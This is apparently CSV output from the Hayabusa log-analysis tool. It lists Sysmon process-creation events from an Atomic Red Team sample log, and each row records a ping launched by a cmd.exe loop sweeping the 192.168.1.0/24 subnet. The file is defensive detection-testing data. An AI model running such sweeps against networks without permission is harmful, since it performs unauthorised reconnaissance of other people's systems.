2019-07-19 23:52:28.537 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.108 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 3452 | PGUID: 747F3D96-D92C-5D31-0000-001072743500",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:52:29.110 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.109 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 4468 | PGUID: 747F3D96-D92D-5D31-0000-001068773500",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:52:29.561 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.110 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 4320 | PGUID: 747F3D96-D92D-5D31-0000-0010787A3500",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:52:30.054 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.111 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 3952 | PGUID: 747F3D96-D92E-5D31-0000-0010787D3500",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:52:30.526 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.112 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 6148 | PGUID: 747F3D96-D92E-5D31-0000-001091803500",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:52:31.015 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.113 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 3800 | PGUID: 747F3D96-D92F-5D31-0000-00109C833500",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:52:31.476 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.114 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 1324 | PGUID: 747F3D96-D92F-5D31-0000-0010478A3500",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:52:32.005 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.115 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 3268 | PGUID: 747F3D96-D92F-5D31-0000-00109A973500",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:52:32.515 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.116 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 1860 | PGUID: 747F3D96-D930-5D31-0000-0010879A3500",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:52:33.004 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.117 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 4996 | PGUID: 747F3D96-D931-5D31-0000-00108F9D3500",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:52:33.515 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.118 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 2460 | PGUID: 747F3D96-D931-5D31-0000-0010A9A03500",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:52:33.900 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.119 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 6156 | PGUID: 747F3D96-D931-5D31-0000-00105CA63500",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:52:34.490 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.120 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 7140 | PGUID: 747F3D96-D932-5D31-0000-001057A93500",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:52:35.031 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.121 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 5832 | PGUID: 747F3D96-D933-5D31-0000-001062AC3500",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:52:35.411 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.122 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 3684 | PGUID: 747F3D96-D933-5D31-0000-001098AF3500",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:52:35.999 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.123 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 208 | PGUID: 747F3D96-D933-5D31-0000-0010B6B23500",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:52:36.510 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.124 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 2600 | PGUID: 747F3D96-D934-5D31-0000-0010A3B53500",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:52:36.905 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.125 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 2596 | PGUID: 747F3D96-D934-5D31-0000-00106ABE3500",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:52:37.449 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.126 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 3356 | PGUID: 747F3D96-D935-5D31-0000-001056C13500",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:52:37.947 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.127 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 5004 | PGUID: 747F3D96-D935-5D31-0000-001042C43500",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:52:38.514 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.128 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 3964 | PGUID: 747F3D96-D936-5D31-0000-00102EC73500",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:52:38.992 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.129 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 6540 | PGUID: 747F3D96-D936-5D31-0000-001075CA3500",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:52:39.508 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.130 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 4324 | PGUID: 747F3D96-D937-5D31-0000-001066CD3500",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:52:40.034 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.131 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 3560 | PGUID: 747F3D96-D938-5D31-0000-001072D03500",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:52:40.520 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.132 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 5224 | PGUID: 747F3D96-D938-5D31-0000-00105ED33500",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:52:40.960 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.133 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 4380 | PGUID: 747F3D96-D938-5D31-0000-00101EDC3500",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:52:41.512 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.134 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 1816 | PGUID: 747F3D96-D939-5D31-0000-001090E23500",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:52:41.967 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.135 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 3320 | PGUID: 747F3D96-D939-5D31-0000-001072EB3500",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:52:42.436 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.136 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 4540 | PGUID: 747F3D96-D93A-5D31-0000-001073EE3500",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:52:42.881 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.137 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 5036 | PGUID: 747F3D96-D93A-5D31-0000-00105FF83500",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:52:43.478 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.138 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 1248 | PGUID: 747F3D96-D93B-5D31-0000-001085FB3500",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:52:43.951 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.139 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 6740 | PGUID: 747F3D96-D93B-5D31-0000-001092FE3500",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:52:44.408 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.140 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 4792 | PGUID: 747F3D96-D93C-5D31-0000-0010B5053600",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:52:44.926 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.141 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 5676 | PGUID: 747F3D96-D93C-5D31-0000-0010B1083600",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:52:45.532 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.142 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 5800 | PGUID: 747F3D96-D93D-5D31-0000-0010A20B3600",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:52:45.970 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.143 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 7156 | PGUID: 747F3D96-D93D-5D31-0000-0010910E3600",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:52:46.405 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.144 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 4172 | PGUID: 747F3D96-D93E-5D31-0000-00107E113600",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:52:46.879 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.145 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 1628 | PGUID: 747F3D96-D93E-5D31-0000-0010FC153600",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:52:47.411 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.146 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 680 | PGUID: 747F3D96-D93F-5D31-0000-001041203600",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:52:47.993 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.147 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 6600 | PGUID: 747F3D96-D93F-5D31-0000-001061233600",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:52:48.567 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.148 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 948 | PGUID: 747F3D96-D940-5D31-0000-00104E263600",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:52:49.026 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.149 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 2136 | PGUID: 747F3D96-D941-5D31-0000-00103C293600",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:52:49.408 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.150 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 868 | PGUID: 747F3D96-D941-5D31-0000-0010282C3600",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:52:50.047 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.151 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 5380 | PGUID: 747F3D96-D942-5D31-0000-0010142F3600",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:52:50.521 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.152 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 3712 | PGUID: 747F3D96-D942-5D31-0000-001013323600",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
